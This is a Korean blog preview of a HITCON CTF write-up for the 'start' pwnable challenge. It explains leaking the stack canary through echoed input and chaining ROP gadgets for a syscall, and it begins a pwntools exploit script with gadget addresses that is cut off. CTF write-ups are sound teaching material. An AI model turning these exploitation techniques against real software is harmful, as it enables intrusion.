CTF/HitconCTF (1) 썸네일형 리스트형 Hitcon pwnable_start Write up 간단한 syscall SROP 문제이다. 일단 입력을 받으면 입력 받은걸 다시 되돌려준다. 이 방식을 이용하여 입력받는 변수 밑에있는 canary 값을 leak 할수있다. 각 가젯을 불러와서 우리가 실행시키고싶은 함수에 레지스터를 맟추고 그 함수를 호출시키면 풀리는 문제이다. 밑에 exit 를 넣은것은 프로그램을 정상적으로 종료하고싶어서 넣었다. from pwn import * p = process("./start") binf = ELF("./start") context.terminal = ['tmux', 'splitw', '-h'] #gdb.attach(p) prdi = 0x004005d5 prsi = 0x0047d69c pppr = 0x0047a6e6 addr_bss = binf.bss() addr_.. 이전 1 다음